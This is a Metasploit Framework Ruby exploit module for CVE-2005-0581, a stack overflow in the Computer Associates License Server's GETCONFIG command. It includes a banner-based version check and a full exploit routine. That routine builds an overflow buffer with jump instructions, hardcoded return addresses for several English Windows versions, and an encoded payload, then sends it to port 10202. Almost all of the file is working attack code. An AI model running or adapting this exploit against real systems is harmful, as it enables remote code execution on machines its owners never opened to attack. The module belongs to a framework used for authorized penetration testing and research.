## # $Id: calicserv_getconfig.rb 8478 2010-02-13 16:16:13Z patrickw $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Computer Associates License Server GETCONFIG Overflow', 'Description' => %q{ This module exploits an vulnerability in the CA License Server network service. By sending an excessively long GETCONFIG packet the stack may be overwritten. }, 'Author' => [ 'Thor Doomen ', # original msf v2 module 'patrick', # msf v3 port :) ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 8478 $', 'References' => [ [ 'CVE', '2005-0581' ], [ 'OSVDB', '14389' ], [ 'BID', '12705' ], [ 'URL', 'http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=213' ], ], 'Privileged' => true, 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 600, 'BadChars' => "\x00\x20", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ # As much as I would like to return back to the DLL or EXE, # all of those modules have a leading NULL in the # loaded @ address :( # name, jmp esi, writable, jmp edi #['Automatic', {} ], # # patrickw - tested OK Windows XP English SP0-1 only 20100214 ['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi ['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi ['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi ['Windows 2003 English SP0', { 'Rets' => [ 0x71bf175f, 0x7ffde0cc, 0x71bf1a2c ] } ], # ws2help.dll esi + peb + edi ], 'DisclosureDate' => 'Mar 02 2005')) register_options( [ Opt::RPORT(10202), ], self.class) end def check connect banner = sock.get_once sock.put("A0 GETCONFIG SELF 0") res = sock.get_once disconnect if (res =~ /OS\<([^\>]+)/) print_status("CA License Server reports OS: #{$1}") return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit connect banner = sock.get_once if (banner !~ /GETCONFIG/) print_status("The server did not return the expected greeting!") end # exploits two different versions at once >:-) # 144 -> return address of esi points to string middle # 196 -> return address of edi points to string beginning # 148 -> avoid exception by patching with writable address # 928 -> seh handler (not useful under XP SP2) buff = rand_text_alphanumeric(900) buff[142, 2] = Rex::Arch::X86.jmp_short(8) # jmp over addresses buff[144, 4] = [target['Rets'][0]].pack('V') # jmp esi buff[148, 4] = [target['Rets'][1]].pack('V') # writable address buff[194, 2] = Rex::Arch::X86.jmp_short(4) # jmp over address buff[196, 4] = [target['Rets'][2]].pack('V') # jmp edi buff[272, payload.encoded.length] = payload.encoded sploit = "A0 GETCONFIG SELF #{buff}" sock.put(sploit) handler disconnect end end =begin eTrust: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<0 1.61.0>NETWORK<192.168.3.22 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 00 0 0 0>RMTV<1.3.1> BrightStor: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<3 1.54.0>NETWORK<11.11.11.111 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00> lic98rmt.exe v0.1.0.15: A0 GCR HOSTNAMEHARDWARELOCALEIDENT1IDENT2IDENT3IDENT4OSOLFFILE<0 0 0>SERVERVERSION<3 1.61.0>NETWORK<192.168.139.128 unknown 255.255.255.0>MACHINECHECKSUMS<0 0 0 0 0 0 0 0 0 0 0 0>RMTV<1.00> =end